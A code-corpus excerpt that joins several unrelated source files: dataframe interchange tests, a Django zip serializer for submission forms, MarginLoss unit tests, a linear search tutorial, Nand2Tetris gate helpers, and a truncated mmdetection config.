{"x": [True, True, False], "y": [1, 2, 0], "z": [9.2, 10.5, 11.8]}
)
dfX = df.__dataframe__()
assert dfX.num_columns() == 3
assert dfX.num_rows() == 3
assert dfX.num_chunks() == 1
assert list(dfX.column_names()) == ["x", "y", "z"]
assert list(dfX.select_columns((0, 2)).column_names()) == list(
dfX.select_columns_by_name(("x", "z")).column_names()
)
@pytest.mark.parametrize(["size", "n_chunks"], [(10, 3), (12, 3), (12, 5)])
def test_df_get_chunks(size, n_chunks, df_from_dict):
df = df_from_dict({"x": list(range(size))})
dfX = df.__dataframe__()
chunks = list(dfX.get_chunks(n_chunks))
assert len(chunks) == n_chunks
assert sum(chunk.num_rows() for chunk in chunks) == size
@pytest.mark.parametrize(["size", "n_chunks"], [(10, 3), (12, 3), (12, 5)])
def test_column_get_chunks(size, n_chunks, df_from_dict):
df = df_from_dict({"x": list(range(size))})
dfX = df.__dataframe__()
chunks = list(dfX.get_column(0).get_chunks(n_chunks))
assert len(chunks) == n_chunks
assert sum(chunk.size for chunk in chunks) == size
def test_get_columns(df_from_dict):
df = df_from_dict({"a": [0, 1], "b": [2.5, 3.5]})
dfX = df.__dataframe__()
for colX in dfX.get_columns():
assert colX.size == 2
assert colX.num_chunks() == 1
assert dfX.get_column(0).dtype[0] == 0
assert dfX.get_column(1).dtype[0] == 2
def test_buffer(df_from_dict):
    """Inspect the raw data buffer of an int column.

    On CPU the buffer memory is read back directly through ctypes and
    compared element-wise against the source values.
    """
    arr = [0, 1, -1]
    df = df_from_dict({"a": arr})
    dfX = df.__dataframe__()
    colX = dfX.get_column(0)
    bufX = colX.get_buffers()
    dataBuf, dataDtype = bufX["data"]
    assert dataBuf.bufsize > 0
    assert dataBuf.ptr != 0
    device, _ = dataBuf.__dlpack_device__()
    # kind 0 corresponds to the integer column created above
    assert dataDtype[0] == 0
    if device == 1:  # CPU-only as we're going to directly read memory here
        # map the reported bitwidth onto the matching ctypes integer type
        bitwidth = dataDtype[1]
        ctype = {
            8: ctypes.c_int8,
            16: ctypes.c_int16,
            32: ctypes.c_int32,
            64: ctypes.c_int64,
        }[bitwidth]
        # read each element straight out of the buffer memory
        for idx, truth in enumerate(arr):
            val = ctype.from_address(dataBuf.ptr + idx * (bitwidth // 8)).value
            assert val == truth, f"Buffer at index {idx} mismatch"
| 31.850575 | 87 | 0.621075 |
ace72c9a29500594f0b4027c8dee9d49f3ede29b | 17,883 | py | Python | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 9 | 2017-02-13T18:17:13.000Z | 2020-11-21T20:15:54.000Z | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 2 | 2021-05-20T14:26:47.000Z | 2021-05-20T14:26:48.000Z | ecs/core/serializer/base.py | programmierfabrik/ecs | 2389a19453e21b2ea4e40b272552bcbd42b926a9 | [
"Apache-2.0"
] | 4 | 2017-04-02T18:48:59.000Z | 2021-11-23T15:40:35.000Z | import json
import zipfile, os, datetime
from tempfile import TemporaryFile
from uuid import uuid4
from collections import OrderedDict
from django.db import models
from django.contrib.contenttypes.fields import GenericRelation
from django.utils import timezone
from django.contrib.postgres.fields import ArrayField
from ecs.core.models import (
SubmissionForm, Submission, EthicsCommission, Investigator,
InvestigatorEmployee, Measure, ParticipatingCenterNonSubject,
ForeignParticipatingCenter, NonTestedUsedDrug,
)
from ecs.documents.models import Document, DocumentType
from ecs.core.paper_forms import get_field_info
CURRENT_SERIALIZER_VERSION = '1.3'  # must match the newest '*' entry in CHANGELOG below
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S+01:00'  # datetime wire format (fixed "+01:00" suffix)
DATE_FORMAT = '%Y-%m-%d'  # ISO 8601 date wire format
DATA_JSON_NAME = 'data.json'  # name of the JSON payload inside the export zip
# Version history of the serialized format, scanned by
# ModelSerializer.is_field_obsolete()/is_field_coming().  Entry shapes:
#   ('*', '<version>')                  -- marks a format version boundary
#   ('+', <model>, '<field>', default)  -- field added after the preceding
#                                          version; `default` is substituted
#                                          when importing older dumps
#   ('-', <model>, '<field>', default)  -- field removed after the preceding
#                                          version
# NOTE(review): 'study_plan_multiple_test' is listed twice under 0.2 —
# looks like an accidental duplicate; confirm before cleaning up.
CHANGELOG = (
    ('*', '0.1'),
    ('+', SubmissionForm, 'project_type_nursing_study', False),
    ('*', '0.2'),
    ('+', SubmissionForm, 'study_plan_multiple_test', False),
    ('+', SubmissionForm, 'study_plan_multiple_test', False),
    ('+', SubmissionForm, 'study_plan_interim_evaluation', False),
    ('+', SubmissionForm, 'study_plan_dataprotection_choice', 'non-personal'),
    ('*', '0.3'),
    ('+', SubmissionForm, 'sponsor_uid_verified_level1', None),
    ('+', SubmissionForm, 'sponsor_uid_verified_level2', None),
    ('*', '0.4'),
    ('-', SubmissionForm, 'sponsor_uid_verified_level1', None),
    ('-', SubmissionForm, 'sponsor_uid_verified_level2', None),
    ('-', SubmissionForm, 'invoice_uid_verified_level1', None),
    ('-', SubmissionForm, 'invoice_uid_verified_level2', None),
    ('+', SubmissionForm, 'sponsor_uid', None),
    ('*', '0.5'),
    ('+', SubmissionForm, 'insurance_not_required', False),
    ('*', '0.6'),
    ('+', SubmissionForm, 'external_reviewer_suggestions', 'nicht zutreffend'),
    ('*', '0.7'),
    ('+', SubmissionForm, 'project_type_non_interventional_study', False),
    ('+', SubmissionForm, 'project_type_gender_medicine', False),
    ('*', '0.8'),
    ('-', SubmissionForm, 'external_reviewer_suggestions', 'nicht zutreffend'),
    ('*', '0.9'),
    ('-', SubmissionForm, 'invoice', None),
    ('*', '1.0'),
    ('-', SubmissionForm, 'protocol_number', 'unbekannt'),
    ('*', '1.1'),
    ('+', SubmissionForm, 'study_plan_alpha_sided', None),
    ('*', '1.2'),
    ('-', SubmissionForm, 'sponsor_agrees_to_publishing', True),
    ('*', '1.3'),
)
class FieldDocs(object):
    """Documentation descriptor for a single serialized model field.

    Used by the serializers' ``docs()`` methods to describe the JSON type,
    value constraints, choices and paper-form info of a field.
    """
    value = True

    def __init__(self, model=None, field=None, choices=None):
        self.model = model
        if isinstance(field, ArrayField):
            # document the element type; remember that values come as arrays
            self.field = field.base_field
            self.array = True
        else:
            self.field = field
            self.array = False
        self._choices = choices

    def json_type(self):
        """Map the Django field class onto a coarse JSON type name."""
        if isinstance(self.field, models.BooleanField):
            return "BOOLEAN"
        elif isinstance(self.field, models.IntegerField):
            return "INTEGER"
        elif isinstance(self.field, (models.FloatField, models.DecimalField)):
            return "FLOAT"
        else:
            return "STRING"

    def constraints(self):
        """Return human-readable value constraints for this field."""
        c = []
        if isinstance(self.field, models.DateTimeField):
            c.append(
                "RFC 3339 with timezone UTC+1 (e.g. 2010-07-14T16:04:35+01:00)")
        elif isinstance(self.field, models.DateField):
            c.append("ISO 8601 with timezone UTC+1 (e.g. 2010-07-14)")
        elif isinstance(self.field, models.CharField):
            c.append("max. {} characters".format(self.field.max_length))
        elif isinstance(self.field, models.FileField):
            c.append("valid internal zip file path")
        if self.field and self.field.null:
            c.append("may be null")
        return c

    def choices(self):
        """Return (json-encoded value, label) pairs, or None if unrestricted."""
        # bugfix: `cs` was unbound (UnboundLocalError) when neither explicit
        # choices nor a field were supplied
        cs = None
        if self._choices:
            cs = self._choices
        elif self.field:
            cs = self.field.choices
        if cs:
            return [(json.dumps(k), v) for k, v in cs]

    def paperform_info(self):
        """Return the paper-form metadata for the field, if any."""
        if self.field:
            return get_field_info(self.model, self.field.name)
class ModelSerializer(object):
    """Generic importer/exporter for one Django model class.

    Subclasses (or constructor arguments) customize behaviour via:
      * ``exclude`` -- field names never (de)serialized,
      * ``groups``  -- name prefixes that nest flat field names into sub-dicts,
      * ``follow``  -- related managers / reverse relations to recurse into,
      * ``fields``  -- optional whitelist of direct fields.
    """
    exclude = ('id',)
    groups = ()
    follow = ()
    fields = ()

    def __init__(self, model, groups=None, exclude=None, follow=None, fields=None):
        self.model = model
        if groups:
            self.groups = groups
        if exclude:
            self.exclude = exclude
        if follow:
            self.follow = follow
        if fields:
            self.fields = fields

    def is_field_obsolete(self, field, version):
        """True if *field* was removed from this model after *version*.

        Scans CHANGELOG newest-to-oldest down to the given version; the most
        recent '+'/'-' entry for the field decides.
        """
        version_index = CHANGELOG.index(('*', version))
        for entry in CHANGELOG[-1:version_index:-1]:
            if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
                return False
            if entry[0] == '-' and entry[1] == self.model and entry[2] == field:
                return True
        return False

    def is_field_coming(self, field, version):
        """True if *field* was added to this model after *version*."""
        version_index = CHANGELOG.index(('*', version))
        for entry in CHANGELOG[-1:version_index:-1]:
            if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
                return True
            if entry[0] == '-' and entry[1] == self.model and entry[2] == field:
                return False
        return False

    def get_default_for_coming_field(self, field, version):
        """Return the CHANGELOG default for a field missing from an old dump."""
        version_index = CHANGELOG.index(('*', version))
        for entry in CHANGELOG[-1:version_index:-1]:
            if entry[0] == '+' and entry[1] == self.model and entry[2] == field:
                return entry[3]

    def get_field_names(self):
        """Names to (de)serialize: direct fields minus excludes, plus follows."""
        names = set(f.name for f in self.model._meta.fields if f.name not in self.exclude)
        if self.fields:
            names = names.intersection(self.fields)
        return names.union(self.follow)

    def split_prefix(self, name):
        """Split *name* into (group prefix, remainder) or (None, name)."""
        prefix, key = None, name
        for group in self.groups:
            if name.startswith(group):
                # +1 skips the underscore between prefix and key
                prefix, key = group, name[len(group)+1:]
                break
        return prefix, key

    def dump_field(self, fieldname, val, zf, obj):
        """Convert one field value into its JSON-serializable form.

        Files are copied into the zip under ``attachments/``; related objects
        and managers are dumped recursively.
        """
        if val is None or isinstance(val, (bool, str, int, list, datetime.datetime, datetime.date)):
            return val
        if hasattr(val, 'all') and hasattr(val, 'count'):
            # duck-typed related manager / queryset: dump every instance
            try:
                result = []
                for x in val.all():
                    result.append(dump_model_instance(x, zf))
                return result
            except ValueError as e:
                raise ValueError("cannot dump {}.{}: {}".format(
                    self.model.__name__, fieldname, e))
        field = self.model._meta.get_field(fieldname)
        if isinstance(field, models.ForeignKey):
            return dump_model_instance(val, zf)
        elif isinstance(field, models.FileField):
            # store the file in the archive under a unique name, keep extension
            name, ext = os.path.splitext(val.name)
            zip_name = 'attachments/{}{}'.format(uuid4(), ext)
            zf.write(val.path, zip_name)
            return zip_name
        else:
            raise ValueError(
                "cannot serialize objects of type {}".format(type(val)))
        # note: an unreachable trailing `return val` after the raise was removed

    def dump(self, obj, zf):
        """Dump *obj* to a (possibly group-nested) dict of plain values."""
        d = {}
        for name in self.get_field_names():
            prefix, key = self.split_prefix(name)
            data = self.dump_field(name, getattr(obj, name), zf, obj)
            if prefix:
                d.setdefault(prefix, {})
                d[prefix][key] = data
            else:
                d[name] = data
        return d

    def load_many(self, model, val, zf, version, commit=True):
        """Load a list of serialized instances of *model*."""
        result = []
        for data in val:
            result.append(load_model_instance(
                model, data, zf, version, commit=commit))
        return result

    def load_field(self, fieldname, val, zf, version):
        """Convert one serialized value back; returns (value, deferr).

        ``deferr`` is True for relations that can only be attached after the
        owning object has been saved.
        """
        if val is None:
            return val, False
        try:
            field = self.model._meta.get_field(fieldname)
        except models.fields.FieldDoesNotExist:
            field = None
        deferr = False
        if field:
            if isinstance(field, models.DateTimeField):
                # the dump is written in UTC (see _JsonEncoder); the "+01:00"
                # suffix in DATETIME_FORMAT is a fixed label, so the parsed
                # naive value is re-attached to UTC here
                val = timezone.make_aware(
                    datetime.datetime.strptime(val, DATETIME_FORMAT),
                    timezone.utc)
            elif isinstance(field, models.DateField):
                # bugfix: datetime.date has no strptime(); parse through
                # datetime and take the date part (previously AttributeError)
                val = datetime.datetime.strptime(val, DATE_FORMAT).date()
            elif isinstance(field, models.ManyToManyField):
                val = self.load_many(field.related_model, val, zf, version)
                deferr = True
            elif isinstance(field, models.ManyToOneRel):
                val = self.load_many(field.related_model, val, zf, version,
                    commit=False)
                deferr = True
            elif isinstance(field, models.ForeignKey):
                val = load_model_instance(field.rel.to, val, zf, version)
            elif isinstance(field, GenericRelation):
                val = self.load_many(field.rel.to, val, zf, version,
                    commit=False)
                deferr = True
        elif isinstance(val, list):
            # reverse relation exposed only as a descriptor on the class
            rel_model = getattr(self.model, fieldname).related.related_model
            val = self.load_many(rel_model, val, zf, version, commit=False)
            deferr = True
        return val, deferr

    def load(self, data, zf, version, commit=True):
        """Reconstruct a model instance from *data*.

        Obsolete fields are skipped; fields newer than *version* get their
        CHANGELOG default.  Deferred relations are attached on first save().
        """
        deferred = []
        fields = {}
        for name in self.get_field_names():
            prefix, key = self.split_prefix(name)
            if self.is_field_obsolete(name, version):
                continue
            elif self.is_field_coming(name, version):
                val = self.get_default_for_coming_field(name, version)
            else:
                if prefix:
                    if prefix in data:
                        val = data[prefix][key]
                    else:
                        continue
                elif key in data:
                    val = data[key]
                else:
                    continue
            val, deferr = self.load_field(name, val, zf, version)
            if deferr:
                deferred.append((name, val, deferr))
            else:
                fields[name] = val
        obj = self.model(**fields)
        obj.clean()
        old_save = obj.save
        def _save(*args, **kwargs):
            # restore the regular save(), persist, then attach deferred
            # relations (they require a primary key)
            del obj.save
            old_save(*args, **kwargs)
            for name, val, action in deferred:
                manager = getattr(obj, name)
                for item in val:
                    manager.add(item)
        obj.save = _save
        if commit:
            obj.save()
        return obj

    def get_field_docs(self, fieldname):
        """Return FieldDocs (or a nested docs dict) for one field."""
        try:
            field = self.model._meta.get_field(fieldname)
            if isinstance(field, models.ForeignKey):
                return _serializers[field.rel.to].docs()
            elif isinstance(field, models.ManyToManyField):
                spec = _serializers[field.rel.to].docs()
                spec['array'] = True
                return spec
            elif isinstance(field, models.ManyToOneRel):
                spec = _serializers[field.related_model].docs()
                spec['array'] = True
                return spec
            return FieldDocs(self.model, field)
        except models.FieldDoesNotExist:
            model = getattr(self.model, fieldname).related.related_model
            spec = _serializers[model].docs()
            spec['array'] = True
            return spec

    def docs(self):
        """Return the full, group-nested documentation tree for this model."""
        d = OrderedDict()
        for name in sorted(self.get_field_names()):
            prefix, key = self.split_prefix(name)
            info = self.get_field_docs(name)
            if prefix:
                d.setdefault(prefix, OrderedDict())
                d[prefix][key] = info
            else:
                d[name] = info
        return d
class DocumentTypeSerializer(object):
    """(De)serializes DocumentType references by their unique name."""

    def load(self, data, zf, version, commit=True):
        """Resolve a document type name back to the DocumentType instance."""
        try:
            return DocumentType.objects.get(name=data)
        except DocumentType.DoesNotExist:
            # bugfix: '{1}' was an out-of-range positional index for a single
            # format argument and raised IndexError instead of this ValueError
            raise ValueError("no such doctype: {}".format(data))

    def docs(self):
        """Document the valid doctype names as a choice list."""
        return FieldDocs(choices=[
            (doctype.name, doctype.name)
            for doctype in DocumentType.objects.all()
        ])

    def dump(self, obj, zf):
        """A document type is serialized as just its name."""
        return obj.name
class DocumentSerializer(ModelSerializer):
    """Serializer for Document: dumps metadata plus the raw file payload."""
    def dump(self, obj, zf):
        # only downloadable document types may leave the system
        assert obj.doctype.is_downloadable
        d = super().dump(obj, zf)
        # store the raw content under a unique archive name; keep a .pdf
        # extension for PDFs so the file is recognizable inside the zip
        zip_name = 'attachments/{}'.format(uuid4())
        if obj.mimetype == 'application/pdf':
            zip_name += '.pdf'
        f = obj.retrieve_raw()
        zf.writestr(zip_name, f.read())
        f.close()
        d['file'] = zip_name
        return d
    def load(self, data, zf, version, commit=True):
        """Recreate the Document; when committing, restore its file content."""
        obj = super().load(data, zf, version, commit=commit)
        if commit:
            # spool the archived payload through a temp file into storage
            with TemporaryFile() as f:
                f.write(zf.read(data['file']))
                f.flush()
                f.seek(0)
                obj.store(f)
        return obj
class EthicsCommissionSerializer(object):
    """(De)serializes EthicsCommission references by their UUID hex string."""

    def dump(self, obj, zf):
        """A commission is serialized as just its uuid hex."""
        return obj.uuid.hex

    def load(self, data, zf, version, commit=False):
        """Resolve a uuid hex back to the EthicsCommission instance."""
        try:
            return EthicsCommission.objects.get(uuid=data)
        except EthicsCommission.DoesNotExist:
            raise ValueError("no such ethicscommission: {}".format(data))

    def docs(self):
        """Document the valid commissions as (uuid hex, name) choices."""
        commissions = EthicsCommission.objects.all()
        return FieldDocs(choices=[
            (commission.uuid.hex, commission.name)
            for commission in commissions
        ])
class SubmissionSerializer(ModelSerializer):
    """Serializer for Submission (only the ec_number field, see _serializers)."""
    def __init__(self, **kwargs):
        super().__init__(Submission, **kwargs)
    def load(self, data, zf, version, commit=False):
        # imports never attach to an existing submission: the dumped data is
        # ignored and a fresh transient placeholder is created instead
        return Submission.objects.create(is_transient=True)
class SubmissionFormSerializer(ModelSerializer):
    """Serializer for SubmissionForm with document filtering on export and
    transient marking on import."""
    def dump_field(self, fieldname, val, zf, obj):
        if fieldname == 'documents':
            # never export documents whose type is not downloadable
            val = val.filter(doctype__is_downloadable=True)
        return super().dump_field(fieldname, val, zf, obj)
    def load(self, data, zf, version, commit=True):
        # load without committing so is_transient can be set before save
        obj = super().load(data, zf, version, commit=False)
        obj.is_transient = True
        if commit:
            obj.save()
        return obj
# Registry mapping each model class to the serializer instance used by
# dump_model_instance() / load_model_instance().
_serializers = {
    SubmissionForm: SubmissionFormSerializer(SubmissionForm,
        groups = (
            'study_plan', 'insurance', 'sponsor', 'invoice', 'german',
            'submitter', 'project_type', 'medtech', 'substance', 'subject',
        ),
        exclude = (
            'pdf_document', 'id', 'current_pending_vote',
            'current_published_vote', 'primary_investigator', 'submitter',
            'sponsor', 'presenter', 'is_transient', 'is_notification_update',
            'is_acknowledged',
        ),
        follow = (
            'participatingcenternonsubject_set',
            'foreignparticipatingcenter_set', 'investigators', 'measures',
            'documents', 'nontesteduseddrug_set',
        ),
    ),
    # only the ec_number survives; import creates a transient submission
    Submission: SubmissionSerializer(fields=('ec_number',)),
    Investigator: ModelSerializer(Investigator,
        exclude=('id', 'submission_form', 'user'),
        follow=('employees',)
    ),
    InvestigatorEmployee: ModelSerializer(InvestigatorEmployee,
        exclude=('id', 'investigator')
    ),
    Measure: ModelSerializer(Measure, exclude=('id', 'submission_form')),
    ParticipatingCenterNonSubject: ModelSerializer(
        ParticipatingCenterNonSubject,
        exclude=('id', 'submission_form')
    ),
    ForeignParticipatingCenter: ModelSerializer(ForeignParticipatingCenter,
        exclude=('id', 'submission_form')
    ),
    NonTestedUsedDrug: ModelSerializer(NonTestedUsedDrug,
        exclude=('id', 'submission_form')
    ),
    Document: DocumentSerializer(Document,
        fields=(
            'doctype', 'name', 'original_file_name', 'date', 'version',
            'mimetype',
        )
    ),
    DocumentType: DocumentTypeSerializer(),
    EthicsCommission: EthicsCommissionSerializer(),
}
def load_model_instance(model, data, zf, version, commit=True):
    """Deserialize one instance of *model* via its registered serializer."""
    serializer = _serializers.get(model)
    if serializer is None:
        raise ValueError("cannot load objects of type {}".format(model))
    return serializer.load(data, zf, version, commit=commit)
def dump_model_instance(obj, zf):
    """Serialize *obj* with the serializer registered for its class.

    Raises:
        ValueError: if no serializer is registered for type(obj).
    """
    if obj.__class__ not in _serializers:
        # fixed typo in the error message ("objecs" -> "objects")
        raise ValueError(
            "cannot serialize objects of type {}".format(obj.__class__))
    return _serializers[obj.__class__].dump(obj, zf)
class _JsonEncoder(json.JSONEncoder):
    """JSON encoder rendering datetimes/dates in the serializer wire formats."""

    def default(self, obj):
        # datetime must be tested before date: datetime is a date subclass
        if isinstance(obj, datetime.datetime):
            normalized = obj.astimezone(timezone.utc)
            return normalized.strftime(DATETIME_FORMAT)
        if isinstance(obj, datetime.date):
            return obj.strftime(DATE_FORMAT)
        return super().default(obj)
class Serializer(object):
    """Reads/writes a complete SubmissionForm as a zip archive.

    The archive holds DATA_JSON_NAME with the serialized form plus any
    referenced attachment files under 'attachments/'.
    """
    version = CURRENT_SERIALIZER_VERSION
    def read(self, file_like):
        """Load a SubmissionForm from a zip produced by write()."""
        zf = zipfile.ZipFile(file_like, 'r')
        data = json.loads(zf.read(DATA_JSON_NAME).decode('utf-8'))
        # the stored 'version' drives CHANGELOG-based field migration
        submission_form = _serializers[SubmissionForm].load(
            data['data'], zf, data['version'])
        return submission_form
    def write(self, submission_form, file_like):
        """Dump *submission_form* (and its attachments) into a zip archive."""
        zf = zipfile.ZipFile(file_like, 'w', zipfile.ZIP_DEFLATED)
        data = {
            'version': self.version,
            'type': 'SubmissionForm',
            'data': dump_model_instance(submission_form, zf),
        }
        zf.writestr(DATA_JSON_NAME,
            json.dumps(data, cls=_JsonEncoder, indent=2, sort_keys=True).encode('utf-8'))
    def docs(self):
        """Return the field documentation tree for SubmissionForm."""
        return _serializers[SubmissionForm].docs()
| 35.837675 | 100 | 0.578371 |
ace72d5e05418b828c6c62fb2718ee88476f1e3a | 3,492 | py | Python | tests/losses/test_margin_loss.py | wconnell/pytorch-metric-learning | 1affee7c77bb5d6d4ee559bad62b910a21b39d48 | [
"MIT"
] | 1 | 2021-01-27T03:36:19.000Z | 2021-01-27T03:36:19.000Z | tests/losses/test_margin_loss.py | umitkacar/pytorch-metric-learning | bf2b7675b7b80e5762b75428d51e4ab0a861e710 | [
"MIT"
] | null | null | null | tests/losses/test_margin_loss.py | umitkacar/pytorch-metric-learning | bf2b7675b7b80e5762b75428d51e4ab0a861e710 | [
"MIT"
] | null | null | null | import unittest
from .. import TEST_DTYPES
import torch
from pytorch_metric_learning.losses import MarginLoss
from pytorch_metric_learning.utils import common_functions as c_f
class TestMarginLoss(unittest.TestCase):
    """Checks MarginLoss against a hand-computed reference implementation."""
    @classmethod
    def setUpClass(self):
        # NOTE(review): conventionally the first parameter of a classmethod is
        # named `cls`; also this hard-requires a CUDA device — confirm intended
        self.device = torch.device('cuda')
    def test_margin_loss(self):
        """Compare MarginLoss output to a manual triplet-wise computation."""
        for dtype in TEST_DTYPES:
            # cover learnable / fixed beta, with and without per-class betas
            for learn_beta, num_classes in [(False, None), (True, None), (False, 3), (True, 3)]:
                margin, nu, beta = 0.1, 0.1, 1
                loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=learn_beta, num_classes=num_classes)
                embedding_angles = [0, 20, 40, 60, 80]
                embeddings = torch.tensor([c_f.angle_to_coord(a) for a in embedding_angles], requires_grad=True, dtype=dtype).to(self.device) #2D embeddings
                labels = torch.LongTensor([0, 0, 1, 1, 2])
                loss = loss_func(embeddings, labels)
                loss.backward()
                # all (anchor, positive, negative) index triplets implied by the labels
                triplets = [(0,1,2), (0,1,3), (0,1,4), (1,0,2), (1,0,3), (1,0,4), (2,3,0), (2,3,1), (2,3,4), (3,2,0), (3,2,1), (3,2,4)]
                correct_total_loss = 0
                num_non_zero = 0
                for a, p, n in triplets:
                    anchor, positive, negative = embeddings[a], embeddings[p], embeddings[n]
                    # hinge terms on euclidean distances around beta +/- margin
                    pos_loss = torch.relu(torch.sqrt(torch.sum((anchor-positive)**2)) - beta + margin)
                    neg_loss = torch.relu(beta - torch.sqrt(torch.sum((anchor-negative)**2)) + margin)
                    correct_total_loss += pos_loss + neg_loss
                    if pos_loss > 0:
                        num_non_zero += 1
                    if neg_loss > 0:
                        num_non_zero += 1
                if num_non_zero > 0:
                    # average only over active (non-zero) hinge terms
                    correct_total_loss /= num_non_zero
                if learn_beta:
                    # beta regularization term, scaled by nu
                    if num_classes is None:
                        correct_beta_reg_loss = (loss_func.beta*nu)
                    else:
                        anchor_idx = [x[0] for x in triplets]
                        correct_beta_reg_loss = torch.sum(loss_func.beta[labels[anchor_idx]]*nu) / num_non_zero
                    correct_total_loss += correct_beta_reg_loss.item()
                # half precision needs a looser tolerance
                rtol = 1e-2 if dtype == torch.float16 else 1e-5
                self.assertTrue(torch.isclose(loss, correct_total_loss, rtol=rtol))
    def test_with_no_valid_triplets(self):
        """With all-distinct labels no triplets form, so the loss must be 0."""
        margin, nu, beta = 0.1, 0, 1
        loss_func = MarginLoss(margin=margin, nu=nu, beta=beta)
        for dtype in TEST_DTYPES:
            embedding_angles = [0, 20, 40, 60, 80]
            embeddings = torch.tensor([c_f.angle_to_coord(a) for a in embedding_angles], requires_grad=True, dtype=dtype).to(self.device) #2D embeddings
            labels = torch.LongTensor([0, 1, 2, 3, 4])
            loss = loss_func(embeddings, labels)
            loss.backward()
            self.assertEqual(loss, 0)
    def test_beta_datatype(self):
        """beta is scalar-shaped unless per-class betas are requested."""
        margin, nu, beta = 0.1, 0, 1
        loss_func = MarginLoss(margin=margin, nu=nu, beta=beta)
        self.assertTrue(len(loss_func.beta) == 1)
        loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=True)
        self.assertTrue(len(loss_func.beta) == 1)
        loss_func = MarginLoss(margin=margin, nu=nu, beta=beta, learn_beta=True, num_classes=35)
        self.assertTrue(len(loss_func.beta) == 35)
| 47.835616 | 156 | 0.567583 |
ace72d5ffcbac14553e4625386057ed493b32bd2 | 524 | py | Python | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 19 | 2019-03-14T01:39:32.000Z | 2022-02-03T00:36:43.000Z | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 1 | 2020-04-10T01:01:16.000Z | 2020-04-10T01:01:16.000Z | unit_13/25-Algorithms/3-Algorithms_in_code/1_linear_search.py | duliodenis/python_master_degree | 3ab76838ce2fc1606f28e988a3273dd27122a621 | [
"MIT"
] | 5 | 2019-01-02T20:46:05.000Z | 2020-07-08T22:47:48.000Z | #
# Algorithms: Algorithms in Code (Linear Search)
# Python Techdegree
#
# Created by Dulio Denis on 3/23/19.
# Copyright (c) 2019 ddApps. All rights reserved.
# ------------------------------------------------
def linear_search(list, target):
    '''
    Scan the sequence from the front; return the index of the first
    element equal to target, or None when target is absent.
    '''
    return next(
        (index for index, value in enumerate(list) if value == target),
        None,
    )
# Demo: search a small sample sequence (renamed from `list`, which
# shadowed the builtin of the same name).
numbers = [1, 2, 3, 4, 5, 6]
print(linear_search(numbers, 3))
print(linear_search(numbers, 7))
| 26.2 | 72 | 0.585878 |
ace72d76e586ad908c9da3987fafaf550c48ca26 | 1,049 | py | Python | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | Components/_1__elementary_performance.py | JetStarBlues/Nand-2-Tetris | c27b5c2ac659f1edb63d36d89bf87e226bc5672c | [
"MIT"
] | null | null | null | '''----------------------------- Imports -----------------------------'''
# Hack computer
from ._x__components import *
'''----------------------------- Helpers -----------------------------'''
negativeOne_ = 2 ** N_BITS - 1  # two's complement -1, i.e. all N_BITS bits set
def toBin( x ):
	'''Render integer x as a zero-padded N_BITS-wide binary string.'''
	bits = bin( x )[ 2 : ]
	return bits.zfill( N_BITS )
def toInt( a ):
	'''Interpret a sequence of bit values as an unsigned integer.'''
	bitstring = ''.join( str( bit ) for bit in a )
	return int( bitstring, 2 )
'''------------------- The elementary logic gates -------------------'''
def not_( x ):
	'''Logical NOT of a single bit (0 <-> 1) via XOR with 1.'''
	flipped = x ^ 1
	return flipped
'''------------------ Multiplexers & Demultiplexers ------------------'''
def mux8to1_( d7, d6, d5, d4, d3, d2, d1, d0, s2, s1, s0 ):
	'''Select one of eight data inputs per the 3-bit select (s2 s1 s0).'''
	sel = str( s2 ) + str( s1 ) + str( s0 )
	routing = {
		'000': d0,
		'001': d1,
		'010': d2,
		'011': d3,
		'100': d4,
		'101': d5,
		'110': d6,
	}
	# anything not matching the explicit entries (incl. '111') routes to d7,
	# exactly like the original chained-conditional's final else
	return routing.get( sel, d7 )
'''------------------------- N-bit variants -------------------------'''
def notN_( x ):
	'''Bitwise NOT over an N-bit word (XOR with the all-ones mask).'''
	return negativeOne_ ^ x
| 19.425926 | 73 | 0.401335 |
ace72d7d5edc58275dcb335362f427b809b99930 | 2,489 | py | Python | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | frequency_config/faster_rcnn_r50_fpn_2x_l1200.py | lvgu597/mm_frequency | bcc2b030140ff1fe6bd27c193c1fbd72f930e923 | [
"Apache-2.0"
] | null | null | null | _base_ = '../config/faster_rcnn_r50_fpn_2x.py'
dataset_type = 'FabricDataset'
data_root = '/home/jkx/project/smallq/tianchidata_coco_base/' # Root path of data
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'), # First pipeline to load images from file path
dict(type='LoadAnnotations', with_bbox=True), # Second pipeline to load annotations for current image
dict(
type='Resize', # Augmentation pipeline that resize the images and their annotations
img_scale=[(3400, 800), (3400, 1200)],
multiscale_mode='range',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5), #翻转 flip_ratio 为翻转概率
dict(type='Normalize', **img_norm_cfg), #规范化image
dict(type='Pad', size_divisor=32), # padding设置,填充图片可被32整出除
dict(type='DefaultFormatBundle'), # Default format bundle to gather data in the pipeline
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), #决定将哪些关键数据传给detection的管道
]
test_pipeline = [
